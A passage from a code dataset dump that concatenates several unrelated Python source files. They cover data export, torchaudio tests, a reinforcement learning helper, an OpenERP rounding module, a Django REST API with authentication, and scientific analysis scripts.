\"\"\"\n 获取下载缓存目录\n \"\"\"\n if not os.path.exists(cls._cache_folder):\n os.makedirs(cls._cache_folder, exist_ok=True)\n return cls._cache_folder\n\n @classmethod\n def cache_contents(cls, entity_ids: List[str] = None, results: List[ResultModel] = None) -> List[str]:\n '''\n 在服务器上缓存需要下载的曲线和结果\n '''\n files = []\n base_path = cls.cache_folder()\n if results is None and entity_ids is None:\n raise Exception('未选中结果或曲线')\n if results is not None:\n result_table = pd.DataFrame(list(map(lambda r: r.as_dict(), results)))\n entity_ids = list(map(lambda r: r.entity_id, results))\n else:\n results = list(map(get_results_model, entity_ids))\n result_table = pd.DataFrame(list(map(lambda r: r.as_dict(), results)))\n result = results[0]\n\n controller = result.controller\n if isinstance(controller, dict):\n controller = TighteningController.find_controller(controller.get('controller_name'))\n view_config = controller.device_type.view_config \\\n if controller is not None and controller.device_type is not None and controller.device_type.view_config is not None else None\n if view_config is None:\n try:\n from qcos_addons.constants import ENV_DEFAULT_DEVICE_VIEW_CONFIG\n view_config = ENV_DEFAULT_DEVICE_VIEW_CONFIG\n except Exception as e:\n _logger.error(e)\n translation_mapping = json.loads(view_config).get('translation_mapping', {})\n result_table.rename(columns=lambda x: translation_mapping.get(x, x), inplace=True)\n try:\n curves = get_curves(entity_ids)\n for curve in curves:\n entity_id = curve.get('entity_id')\n f = f'{entity_id}.csv'.replace('/', '@')\n f = os.path.join(base_path, f)\n dd = pd.DataFrame(dict([(k, pd.Series(v)) for k, v in curve.get('curve').items()]))\n dd.to_csv(f, index=False)\n files.append(f)\n except Exception as e:\n _logger.error(e)\n try:\n rf = os.path.join(base_path, \"results.csv\")\n result_table.to_csv(rf, index=False)\n files.append(rf)\n except Exception as e:\n _logger.error(e)\n return files\n\n @classmethod\n def clean_cached_files(cls):\n \"\"\"\n 清除缓存的文件\n \"\"\"\n fds = ['*.json', '*.csv']\n folder = cls.cache_folder()\n for fd in fds:\n for f in Path(folder).glob(fd):\n try:\n f.unlink()\n except OSError as e:\n _logger.error(f\"Error: {f} : {e}\")\n\n @classmethod\n def prepare_download_file(cls, entity_ids: List[str] = None, results: List[ResultModel] = None):\n \"\"\"\n 创建需要下载的文件并返回文件名\n \"\"\"\n fn = f'{cls.cache_folder()}/curves.zip'\n chk_file = Path(fn)\n\n if chk_file.is_file():\n chk_file.unlink()\n\n if entity_ids is None and results is None:\n raise Exception('未选中结果或曲线')\n n = len(results) if results else len(entity_ids)\n if n > cls._max_download_count:\n raise Exception(f'单次下载最大支持{cls._max_download_count}条曲线,当前为{n}条')\n files = cls.cache_contents(entity_ids=entity_ids, results=results)\n\n if not files:\n raise Exception('未生成数据')\n with zipfile.ZipFile(fn, 'w') as f:\n for file in files:\n if not os.path.exists(file):\n continue\n f.write(file, arcname=os.path.basename(file), compress_type=zipfile.ZIP_DEFLATED)\n cls.clean_cached_files()\n return fn\n","sub_path":"qcos_addons/download/CurveResultDownloader.py","file_name":"CurveResultDownloader.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"95539613","text":"\"\"\"Test defintion common to CPU and CUDA\"\"\"\nimport torch\nimport torchaudio.functional as F\nfrom parameterized import parameterized\nimport numpy as np\nfrom scipy import signal\n\nfrom torchaudio_unittest import common_utils\nfrom torchaudio_unittest.common_utils import nested_params\n\n\nclass Functional(common_utils.TestBaseMixin):\n def test_lfilter_simple(self):\n \"\"\"\n Create a very basic signal,\n Then make a simple 4th order delay\n The output should be same as the input but shifted\n \"\"\"\n\n torch.random.manual_seed(42)\n waveform = torch.rand(2, 44100 * 1, dtype=self.dtype, device=self.device)\n b_coeffs = torch.tensor([0, 0, 0, 1], dtype=self.dtype, device=self.device)\n a_coeffs = torch.tensor([1, 0, 0, 0], dtype=self.dtype, device=self.device)\n output_waveform = F.lfilter(waveform, a_coeffs, b_coeffs)\n\n self.assertEqual(output_waveform[:, 3:], waveform[:, 0:-3], atol=1e-5, rtol=1e-5)\n\n def test_lfilter_clamp(self):\n input_signal = torch.ones(1, 44100 * 1, dtype=self.dtype, device=self.device)\n b_coeffs = torch.tensor([1, 0], dtype=self.dtype, device=self.device)\n a_coeffs = torch.tensor([1, -0.95], dtype=self.dtype, device=self.device)\n output_signal = F.lfilter(input_signal, a_coeffs, b_coeffs, clamp=True)\n assert output_signal.max() <= 1\n output_signal = F.lfilter(input_signal, a_coeffs, b_coeffs, clamp=False)\n assert output_signal.max() > 1\n\n @parameterized.expand([\n ((44100,),),\n ((3, 44100),),\n ((2, 3, 44100),),\n ((1, 2, 3, 44100),)\n ])\n def test_lfilter_shape(self, shape):\n torch.random.manual_seed(42)\n waveform = torch.rand(*shape, dtype=self.dtype, device=self.device)\n b_coeffs = torch.tensor([0, 0, 0, 1], dtype=self.dtype, device=self.device)\n a_coeffs = torch.tensor([1, 0, 0, 0], dtype=self.dtype, device=self.device)\n output_waveform = F.lfilter(waveform, a_coeffs, b_coeffs)\n assert shape == waveform.size() == output_waveform.size()\n\n def test_lfilter_9th_order_filter_stability(self):\n \"\"\"\n Validate the precision of lfilter against reference scipy implementation when using high order filter.\n The reference implementation use cascaded second-order filters so is more numerically accurate.\n \"\"\"\n # create an impulse signal\n x = torch.zeros(1024, dtype=self.dtype, device=self.device)\n x[0] = 1\n\n # get target impulse response\n sos = signal.butter(9, 850, 'hp', fs=22050, output='sos')\n y = torch.from_numpy(signal.sosfilt(sos, x.cpu().numpy())).to(self.dtype).to(self.device)\n\n # get lfilter coefficients\n b, a = signal.butter(9, 850, 'hp', fs=22050, output='ba')\n b, a = torch.from_numpy(b).to(self.dtype).to(self.device), torch.from_numpy(\n a).to(self.dtype).to(self.device)\n\n # predict impulse response\n yhat = F.lfilter(x, a, b, False)\n self.assertEqual(yhat, y, atol=1e-4, rtol=1e-5)\n\n @parameterized.expand([(0., ), (1., ), (2., ), (3., )])\n def test_spectogram_grad_at_zero(self, power):\n \"\"\"The gradient of power spectrogram should not be nan but zero near x=0\n\n https://github.com/pytorch/audio/issues/993\n \"\"\"\n x = torch.zeros(1, 22050, requires_grad=True)\n spec = F.spectrogram(\n x,\n pad=0,\n window=None,\n n_fft=2048,\n hop_length=None,\n win_length=None,\n power=power,\n normalized=False,\n )\n spec.sum().backward()\n assert not x.grad.isnan().sum()\n\n\nclass FunctionalComplex(common_utils.TestBaseMixin):\n complex_dtype = None\n real_dtype = None\n device = None\n\n @nested_params(\n [0.5, 1.01, 1.3],\n [True, False],\n )\n def test_phase_vocoder_shape(self, rate, test_pseudo_complex):\n \"\"\"Verify the output shape of phase vocoder\"\"\"\n hop_length = 256\n num_freq = 1025\n num_frames = 400\n batch_size = 2\n\n torch.random.manual_seed(42)\n spec = torch.randn(\n batch_size, num_freq, num_frames, dtype=self.complex_dtype, device=self.device)\n if test_pseudo_complex:\n spec = torch.view_as_real(spec)\n\n phase_advance = torch.linspace(\n 0,\n np.pi * hop_length,\n num_freq,\n dtype=self.real_dtype, device=self.device)[..., None]\n\n spec_stretch = F.phase_vocoder(spec, rate=rate, phase_advance=phase_advance)\n\n assert spec.dim() == spec_stretch.dim()\n expected_shape = torch.Size([batch_size, num_freq, int(np.ceil(num_frames / rate))])\n output_shape = (torch.view_as_complex(spec_stretch) if test_pseudo_complex else spec_stretch).shape\n assert output_shape == expected_shape\n","sub_path":"test/torchaudio_unittest/functional/functional_impl.py","file_name":"functional_impl.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"511065747","text":"#!/usr/bin/env python3\n\"\"\" Epsilon Greedy \"\"\"\nimport numpy as np\nimport gym\n\n\ndef epsilon_greedy(Q, state, epsilon):\n \"\"\"Function that uses epsilon-greedy\n to determine the next action\"\"\"\n p = np.random.uniform(0, 1)\n if p > epsilon:\n action = np.argmax(Q[state, :])\n else:\n action = np.random.randint(0, Q.shape[1])\n return action\n","sub_path":"reinforcement_learning/0x00-q_learning/2-epsilon_greedy.py","file_name":"2-epsilon_greedy.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"294277731","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 OpenERP SA ()\n# Copyright (C) 2011-2015 Serpent Consulting Services Pvt. Ltd.\n# ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nimport time\nfrom openerp.osv import osv, fields\nfrom openerp import netsvc, tools\nfrom openerp.tools.translate import _\nfrom openerp import workflow\nfrom openerp import SUPERUSER_ID\nimport openerp.addons.decimal_precision as dp\n\nclass pos_order_line(osv.osv):\n _inherit = \"pos.order.line\"\n\n def _amount_line_all(self, cr, uid, ids, field_names, arg, context=None):\n res = dict([(i, {}) for i in ids])\n account_tax_obj = self.pool.get('account.tax')\n cur_obj = self.pool.get('res.currency')\n for line in self.browse(cr, uid, ids, context=context):\n taxes_ids = [ tax for tax in line.product_id.taxes_id if tax.company_id.id == line.order_id.company_id.id ]\n price = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\n taxes = account_tax_obj.compute_all(cr, uid, taxes_ids, price, line.qty, product=line.product_id, partner=line.order_id.partner_id or False)\n\n cur = line.order_id.pricelist_id.currency_id\n res[line.id]['price_subtotal'] = round(taxes['total']*20)/20 \n res[line.id]['price_subtotal_incl'] = round(taxes['total_included']*20)/20 \n return res\n\n def onchange_product_id(self, cr, uid, ids, pricelist, product_id, qty=0, partner_id=False, context=None):\n context = context or {}\n if not product_id:\n return {}\n if not pricelist:\n raise osv.except_osv(_('No Pricelist!'),\n _('You have to select a pricelist in the sale form !\\n' \\\n 'Please set one before choosing a product.'))\n\n price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],\n product_id, qty or 1.0, partner_id)[pricelist]\n\n result = self.onchange_qty(cr, uid, ids, product_id, 0.0, qty, price, context=context)\n result['value']['price_unit'] = round(price*20)/20\n return result\n\n def onchange_qty(self, cr, uid, ids, product, discount, qty, price_unit, context=None):\n result = {}\n if not product:\n return result\n account_tax_obj = self.pool.get('account.tax')\n cur_obj = self.pool.get('res.currency')\n\n prod = self.pool.get('product.product').browse(cr, uid, product, context=context)\n\n price = price_unit * (1 - (discount or 0.0) / 100.0)\n taxes = account_tax_obj.compute_all(cr, uid, prod.taxes_id, price, qty, product=prod, partner=False)\n\n result['price_subtotal'] = round(taxes['total']*20)/20 \n result['price_subtotal_incl'] = round(taxes['total_included']*20)/20 \n return {'value': result}\n\n _columns = {\n 'price_subtotal': fields.function(_amount_line_all, multi='pos_order_line_amount', digits_compute=dp.get_precision('Product Price'), string='Subtotal w/o Tax', store=True),\n 'price_subtotal_incl': fields.function(_amount_line_all, multi='pos_order_line_amount', digits_compute=dp.get_precision('Account'), string='Subtotal', store=True),\n }\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"pos_rounding/models/point_of_sale.py","file_name":"point_of_sale.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"440257439","text":"import re\n\n# Import file\nfilename = 'Prob11.in.txt'\n\nwith open(filename) as file:\n\n test_cases = int(file.readline().strip())\n\n while test_cases > 0:\n\n line = file.readline().strip().split()\n\n newLine = []\n\n for word in line:\n reversedWord = re.sub(r'\\b\\S*\\b', lambda m: m.group(0)[::-1], word)\n\n newString = ''\n\n for i in range(len(reversedWord)):\n if word[i].isupper():\n newString += reversedWord[i].upper()\n else:\n newString += reversedWord[i].lower()\n\n newLine.append(newString)\n\n print(' '.join(newLine))\n\n test_cases -= 1","sub_path":"Codequest/2017/Prob11.py","file_name":"Prob11.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"134404947","text":"\n# from torch.utils.data.dataset import T\nfrom options import read_options_yaml, print_options_yaml, define_test, gen_test_opts\nfrom IO import save_check, load_check\nfrom molecule import Molecule\nfrom grids import SamplingCoords\nfrom data import MolOnGrid, collate_fn_MolOnGrid, eval_I\nimport torch\nimport numpy as np\nimport pickle\nimport os\nimport os.path as osp\nimport shutil\nfrom torch.utils.data import DataLoader\nimport gen_molecules\n\n\n\nopts = read_options_yaml('./options.yaml')\ndevice = 'cuda'\nprint(\"==============OPTIONS==============\")\nprint_options_yaml(opts)\ntest_opts = gen_test_opts(opts)\nprint_options_yaml(test_opts)\n\n# define model and optimzer\nif test_opts['checkpoint']['from_DDP']:\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = '12355'\n import torch.distributed as dist\n dist.init_process_group(\"nccl\", rank=0, world_size=1)\nmodel = define_test(test_opts, is_ddp=test_opts['checkpoint']['from_DDP'], device=device)\nassert 'checkpoint' in test_opts and test_opts['checkpoint']['path'] is not None\ncheckpoint_path = test_opts['checkpoint']['path']\nif 'state_dict_only' in test_opts['checkpoint'] and test_opts['checkpoint']['state_dict_only']:\n model.load_state_dict(torch.load(checkpoint_path))\nelse:\n itr, model, _, loss = load_check(checkpoint_path, model=model, optimizer=None)\n\n# test all structures\npath = './test1'\nshutil.copyfile(checkpoint_path, osp.join(path, 'checkpoint.chk'))\ndataset = MolOnGrid(test_opts['molecules'], test_opts['sampling'], path=path, device=device)\ntest_err = np.zeros((6, len(dataset)))\nfor i_struc, data in enumerate(dataset):\n mol, x = data['mol'], data['x']\n y = model(x.to(device)).mean(1)\n vxc = y.detach()\n # calculate new density\n vxc_mat = mol.V_mat(vxc, package='torch', device=device)\n dm_new = mol.dm_from_Vxc_mat(vxc_mat) # KS\n rho_new = mol.density_on_grid(dm_new, deriv=0, package='torch', device=device).squeeze(0).float()\n # use new density for loss\n rho_target = mol.rho('ccsd', package='torch', device=device).squeeze(0).float()\n rho_diff = rho_new - rho_target\n mean_rho_diff, max_rho_diff = rho_diff.abs().mean().item(), rho_diff.abs().max().item()\n print(\"i_struc %d,\\tmean_rho_diff = %10f\\tmax_rho_diff = %10f\" %(i_struc, mean_rho_diff, max_rho_diff))\n \n err_I = eval_I(rho_new, rho_target, mol.grid.weights)\n print(\"errorItg = %10.8e\"%(err_I))\n\n # # scf\n # sampling_coords = SamplingCoords(mol.grid, test_opts['sampling'])\n # sampling_coords.mesh_out()\n # dm_scf = mol.dm_scf_ml(model, sampling_coords, mol.dm_dft, device=device, input_shape='vanilla')\n # dm_scf_diff = dm_scf-mol.dm_ccsd\n # rho_scf_diff = mol.density_on_grid(dm_scf_diff, deriv=0, package='torch', device=device).squeeze(0).float()\n # rho_scf = mol.density_on_grid(dm_scf, deriv=0, package='torch', device=device).squeeze(0).float()\n\n # mean_scf_diff, max_scf_diff = rho_scf_diff.abs().mean().item(), rho_scf_diff.abs().max().item()\n # err_I_scf = eval_I(rho_scf, rho_target, mol.grid.weights)\n # print(\"i_struc %d,\\tmean_SCF_diff = %10f\\tmax_SCF_diff = %10f\" %(i_struc, mean_scf_diff, max_scf_diff))\n # print(\"errorItg_SCF = %10.8e\"%(err_I_scf))\n\n test_err[0,i_struc] = mean_rho_diff\n test_err[1,i_struc] = max_rho_diff\n test_err[2,i_struc] = err_I\n # test_err[3,i_struc] = mean_scf_diff\n # test_err[4,i_struc] = max_scf_diff\n # test_err[5,i_struc] = err_I_scf\n\n with open(osp.join(path, 'coords.pkl'), 'ab') as f_c:\n pickle.dump(data['mol'].grid.coords, f_c)\n with open(osp.join(path, 'rho_diff.pkl'), 'ab') as f_rho:\n pickle.dump(rho_diff.cpu().numpy(), f_rho)\n # with open(osp.join(path, 'rho_scf_diff.pkl'), 'ab') as f_rho_scf:\n # pickle.dump(rho_scf_diff.cpu().numpy(), f_rho_scf)\n with open(osp.join(path, 'vxc.pkl'), 'ab') as f_v:\n pickle.dump(vxc.cpu().numpy(), f_v)\n\nnp.save(osp.join(path, 'test_err_log.npy'), test_err)","sub_path":"test_MolOnGrid.py","file_name":"test_MolOnGrid.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"526767519","text":"#\n# Copyright 2012 Cisco Systems, Inc.\n#\n# Author: Soren Hansen \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom django.conf.urls import url\nfrom django.contrib.auth.models import User\nfrom django.core.serializers import json\nfrom django.db import models\nfrom django.utils import simplejson\nfrom tastypie import fields, http\nfrom tastypie.api import Api\nfrom tastypie.authentication import BasicAuthentication, ApiKeyAuthentication\nfrom tastypie.authorization import DjangoAuthorization\nfrom tastypie.bundle import Bundle\nfrom tastypie.constants import ALL_WITH_RELATIONS\nfrom tastypie.models import create_api_key\nfrom tastypie.resources import ModelResource\nfrom repomgmt.models import Architecture, Repository, PackageSource, Series\nfrom repomgmt.models import Subscription, UbuntuSeries\nfrom tastypie.serializers import Serializer\nfrom tastypie.exceptions import Unauthorized\n\napi = Api(api_name='v1')\n\n\nclass PrettyJSONSerializer(Serializer):\n json_indent = 2\n\n def to_json(self, data, options=None):\n options = options or {}\n data = self.to_simple(data, options)\n return json.json.dumps(data, cls=json.DjangoJSONEncoder, sort_keys=True,\n ensure_ascii=False, indent=self.json_indent)\n\n\n# Copied from up-to-date tastypie\nclass MultiAuthentication(object):\n \"\"\"\n An authentication backend that tries a number of backends in order.\n \"\"\"\n def __init__(self, *backends, **kwargs):\n super(MultiAuthentication, self).__init__(**kwargs)\n self.backends = backends\n\n def is_authenticated(self, request, **kwargs):\n \"\"\"\n Identifies if the user is authenticated to continue or not.\n\n Should return either ``True`` if allowed, ``False`` if not or an\n ``HttpResponse`` if you need something custom.\n \"\"\"\n unauthorized = False\n\n for backend in self.backends:\n check = backend.is_authenticated(request, **kwargs)\n\n if check:\n if isinstance(check, http.HttpUnauthorized):\n unauthorized = unauthorized or check\n else:\n request._authentication_backend = backend\n return check\n\n return unauthorized\n\n def get_identifier(self, request):\n \"\"\"\n Provides a unique string identifier for the requestor.\n\n This implementation returns a combination of IP address and hostname.\n \"\"\"\n try:\n return request._authentication_backend.get_identifier(request)\n except AttributeError:\n return 'nouser'\n\n\nclass DjangoAuthorizationWithObjLevelPermissions(DjangoAuthorization):\n def create_detail(self, object_list, bundle):\n klass = self.base_checks(bundle.request, bundle.obj.__class__)\n\n if klass is False:\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n permission = '%s.add_%s' % (klass._meta.app_label, klass._meta.module_name)\n\n if not bundle.request.user.has_perm(permission, bundle.obj):\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n return True\n\n def update_list(self, object_list, bundle):\n klass = self.base_checks(bundle.request, object_list.model)\n\n if klass is False:\n return []\n\n permission = '%s.change_%s' % (klass._meta.app_label, klass._meta.module_name)\n if not all(bundle.request.user.has_perm(permission, obj) for obj in object_list):\n return []\n\n return object_list\n\n def update_detail(self, object_list, bundle):\n klass = self.base_checks(bundle.request, bundle.obj.__class__)\n\n if klass is False:\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n permission = '%s.change_%s' % (klass._meta.app_label, klass._meta.module_name)\n\n if not bundle.request.user.has_perm(permission, bundle.obj):\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n return True\n\n def delete_list(self, object_list, bundle):\n klass = self.base_checks(bundle.request, object_list.model)\n\n if klass is False:\n return []\n\n permission = '%s.delete_%s' % (klass._meta.app_label, klass._meta.module_name)\n\n if not all(bundle.request.user.has_perm(permission, obj) for obj in object_list):\n return []\n\n return object_list\n\n def delete_detail(self, object_list, bundle):\n klass = self.base_checks(bundle.request, bundle.obj.__class__)\n\n if klass is False:\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n permission = '%s.delete_%s' % (klass._meta.app_label, klass._meta.module_name)\n\n if not bundle.request.user.has_perm(permission, bundle.obj):\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n return True\n\n def _create_detail(self, object_list, bundle):\n cls = self.base_checks(bundle.request, bundle.obj.__class__)\n if hasattr(cls, 'allow_unprivileged_creation'):\n return cls.allow_unprivileged_creation()\n return super(DjangoAuthorizationWithObjLevelPermissions, self).create_detail(object_list, bundle)\n\n\nclass ApiKeyAuthenticationWithHeaderSupport(ApiKeyAuthentication):\n def extract_credentials(self, request):\n if request.META.get('HTTP_AUTHORIZATION') and request.META['HTTP_AUTHORIZATION'].lower().startswith('apikey '):\n (auth_type, data) = request.META['HTTP_AUTHORIZATION'].split()\n\n if auth_type.lower() != 'apikey':\n raise ValueError(\"Incorrect authorization header.\")\n\n username, api_key = data.split(':', 1)\n else:\n username = request.GET.get('username') or request.POST.get('username')\n api_key = request.GET.get('api_key') or request.POST.get('api_key')\n\n return username, api_key\n\n def is_authenticated(self, request, **kwargs):\n \"\"\"\n Finds the user and checks their API key.\n\n Should return either ``True`` if allowed, ``False`` if not or an\n ``HttpResponse`` if you need something custom.\n \"\"\"\n try:\n username, api_key = self.extract_credentials(request)\n except ValueError:\n return self._unauthorized()\n\n try:\n user = User.objects.get(username=username)\n except (User.DoesNotExist, User.MultipleObjectsReturned):\n return self._unauthorized()\n\n request.user = user\n return self.get_key(user, api_key)\n\n\nclass ArchitectureResource(ModelResource):\n class Meta:\n queryset = Architecture.objects.all()\n resource_name = 'architecture'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n\n\nclass PackageSourceResource(ModelResource):\n class Meta:\n queryset = PackageSource.objects.all()\n resource_name = 'packagesource'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n filtering = {'id': ALL_WITH_RELATIONS}\n\n\nclass RepositoryResource(ModelResource):\n series = fields.ToManyField(\"repomgmt.api.SeriesResource\", 'series_set',\n related_name='repository', null=True)\n\n class Meta:\n queryset = Repository.objects.all()\n resource_name = 'repository'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n filtering = {'name': ALL_WITH_RELATIONS}\n\n def hydrate_m2m(self, bundle):\n bundle.obj.uploaders.add(bundle.request.user)\n return super(RepositoryResource, self).hydrate_m2m(bundle)\n\nclass HttpAccepted(http.HttpResponse):\n status_code = 202\n\n\nclass SeriesResource(ModelResource):\n repository = fields.ForeignKey(RepositoryResource, 'repository')\n base_ubuntu_series = fields.CharField()\n based_on = fields.ForeignKey('repomgmt.api.SeriesResource', 'update_from', null=True)\n subscriptions = fields.ToManyField(\"repomgmt.api.SubscriptionResource\", 'subscription_set')\n\n\n class Meta:\n queryset = Series.objects.all()\n resource_name = 'series'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n filtering = {'repository': ALL_WITH_RELATIONS,\n 'name': ALL_WITH_RELATIONS,\n 'id': ALL_WITH_RELATIONS}\n\n\n @classmethod\n def api_field_from_django_field(cls, f, default=fields.CharField):\n result = default\n \n if f.name == 'state':\n return fields.CharField\n elif f.get_internal_type() in ('DateField', 'DateTimeField'):\n result = fields.DateTimeField\n elif f.get_internal_type() in ('BooleanField', 'NullBooleanField'):\n result = fields.BooleanField\n elif f.get_internal_type() in ('DecimalField', 'FloatField'):\n result = fields.FloatField\n elif f.get_internal_type() in ('IntegerField', 'PositiveIntegerField', 'PositiveSmallIntegerField', 'SmallIntegerField'):\n result = fields.IntegerField\n elif f.get_internal_type() in ('FileField', 'ImageField'):\n result = fields.FileField\n return result\n\n def post_detail(self, request, **kwargs):\n deserialized = self.deserialize(request, request.raw_post_data,\n format=request.META.get('CONTENT_TYPE', 'application/json'))\n deserialized = self.alter_deserialized_detail_data(request,\n deserialized)\n\n basic_bundle = self.build_bundle(request=request)\n obj = self.cached_obj_get(bundle=basic_bundle, **self.remove_api_resource_names(kwargs))\n if deserialized.get('action', None) == 'promote':\n obj.promote()\n return HttpAccepted()\n return http.HttpBadRequest()\n\n def __get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):\n if bundle_or_obj is None:\n return super(SeriesResource, self).get_resource_uri(bundle_or_obj, url_name)\n\n if isinstance(bundle_or_obj, Bundle):\n obj = bundle_or_obj.obj\n else:\n obj = bundle_or_obj\n\n kwargs = {\n 'resource_name': self._meta.resource_name,\n 'repository__name': obj.repository.name,\n 'name': obj.name\n }\n\n if self._meta.api_name is not None:\n kwargs['api_name'] = self._meta.api_name\n\n return self._build_reverse_url(\"api_dispatch_detail\",\n kwargs=kwargs)\n\n def __override_urls(self):\n return [\n url(r\"^(?P%s)/(?P[\\w\\d_.-]+)/(?P[\\w\\d_.-]+)/$\" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name=\"api_dispatch_detail\"),\n ]\n\n def hydrate_base_ubuntu_series(self, bundle):\n bundle.obj.base_ubuntu_series = UbuntuSeries.objects.filter(name__iendswith=bundle.data['base_ubuntu_series'])[0]\n return bundle\n\n def dehydrate_base_ubuntu_series(self, bundle):\n return bundle.obj.base_ubuntu_series.name\n\n def hydrate_state(self, bundle):\n try:\n state_id = int(bundle.data['state'])\n bundle.data['state'] = state_id\n except ValueError:\n for state_id, state_name in Series.SERIES_STATES:\n if bundle.data['state'] == state_name:\n bundle.data['state'] = state_id\n break\n\n return bundle\n\n def dehydrate_state(self, bundle):\n return bundle.obj.get_state_display()\n\nclass SubscriptionResource(ModelResource):\n package_source = fields.ToOneField(PackageSourceResource, 'source')\n destination_series = fields.ForeignKey(SeriesResource, 'target_series')\n\n class Meta:\n queryset = Subscription.objects.all()\n resource_name = 'subscription'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n filtering = {'destination_series': ALL_WITH_RELATIONS,\n 'package_source': ALL_WITH_RELATIONS,\n 'id': ALL_WITH_RELATIONS}\n\n\napi.register(ArchitectureResource())\napi.register(RepositoryResource())\napi.register(SeriesResource())\napi.register(SubscriptionResource())\napi.register(PackageSourceResource())\n\nmodels.signals.post_save.connect(create_api_key, sender=User)\n","sub_path":"repomgmt/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":13887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"324783994","text":"# this function implements the MCP overlapcorrection as described in: A. S. Tremsin, J. V. Vallerga, J. B. McPhate, and O. H. # W. Siegmund, Optimization of Timepix count rate capabilities for the applications with a periodic input signal, J. Instrum., vol. 9, no. 5, 2014. https://doi.org/10.1088/1748-0221/9/05/C05026\n\n\nimport glob,sys,os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom IPython.display import display, HTML\nimport numpy as np\nfrom astropy.io import fits\nimport shutil\n\ndef interAssig(value,intervalDict,df_shutterCount, tolerance): \n #auxiliary function for OverLapCorrection\n for keyInt in intervalDict:\n if (intervalDict[keyInt][0]-tolerance)<= value <=(intervalDict[keyInt][1]+tolerance):\n return keyInt,df_shutterCount['Counts'][keyInt]\n\ndef OverLapCorrection(folder_input, folder_output, filename_output, num_windows):\n \n # here fits and txt files are sorted, the last fits is excluded being the SumImg\n sorted_fits= sorted(glob.glob(folder_input+'/*.fits'))[:-1]\n sorted_TXT= sorted(glob.glob(folder_input+'/*.txt'))\n #display(sorted_TXT)\n\n # the output folder is created if non-existing\n if not os.path.exists(folder_output):\n os.makedirs(folder_output)\n\n# display(sorted_TXT[0]) #shutter counts\n# display(sorted_TXT[1]) # shutter times\n# display(sorted_TXT[2]) #spectra\n# display(sorted_TXT[3]) # status\n filename_spectra= sorted_TXT[2]\n filename_shuttercount = sorted_TXT[0]\n filename_shuttertime = sorted_TXT[1]\n df = pd.read_csv( filename_spectra,delim_whitespace=True,header=None,\n names=['Time','Spectra'])\n df['diff']=df['Time'].diff()\n df['Spectra']= df['Spectra']/df['Spectra'].max()\n df['diff']= df['diff']/df['diff'].max()\n\n df_shutterTime = pd.read_csv(filename_shuttertime,delim_whitespace=True,header=None,\n names=['t0','t1'], nrows=num_windows)\n\n df_shutterCount = pd.read_csv(filename_shuttercount,delim_whitespace=True,header=None,\n names=['Counts'], nrows=num_windows, index_col=0)\n\n# display(df_shutterCount)\n\n\n df_shutterTime=np.asarray(df_shutterTime.stack(level=[0]))\n\n# display(df_shutterTime)\n\n df.plot(x='Time',y=['Spectra','diff'],grid=True,figsize=(8,6))\n sumTime = 0\n TimeArray = np.zeros(num_windows*2)\n index=0\n for i in df_shutterTime:\n print(i)\n sumTime += i\n TimeArray[index] = 